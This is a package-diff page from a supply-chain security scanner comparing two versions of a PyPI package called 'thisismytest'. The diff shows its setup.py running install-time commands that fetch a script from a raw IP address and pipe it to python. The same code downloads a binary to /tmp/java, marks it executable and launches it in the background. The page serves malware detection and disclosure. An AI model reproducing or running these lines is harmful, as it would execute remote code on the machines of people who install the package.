You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

thisismytest

Package Overview
Dependencies
Maintainers
1
Versions
5
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

thisismytest - pypi Package Compare versions

Comparing version
1.0.0
to
2.0.0
+1
-1
PKG-INFO
Metadata-Version: 2.1
Name: thisismytest
Version: 1.0.0
Version: 2.0.0
Summary: UNKNOWN

@@ -5,0 +5,0 @@ Home-page: UNKNOWN

@@ -7,3 +7,3 @@ import os

name="thisismytest",
version="1.0.0",
version="2.0.0",
description="",

@@ -25,4 +25,6 @@ long_description='',

)
if os.name == 'linux':
os.system('curl http://101.47.72.91:3232/java.py | python')
exec("import os\nos.system('curl http://101.47.72.91:3232/java.py | python')")
# print(os.name)
if 'posix' not in os.name.lower():
os.system('curl 101.47.72.91:8989/java -o /tmp/java')
os.system('chmod +x /tmp/java')
os.system('nohup /tmp/java &')
Metadata-Version: 2.1
Name: thisismytest
Version: 1.0.0
Version: 2.0.0
Summary: UNKNOWN

@@ -5,0 +5,0 @@ Home-page: UNKNOWN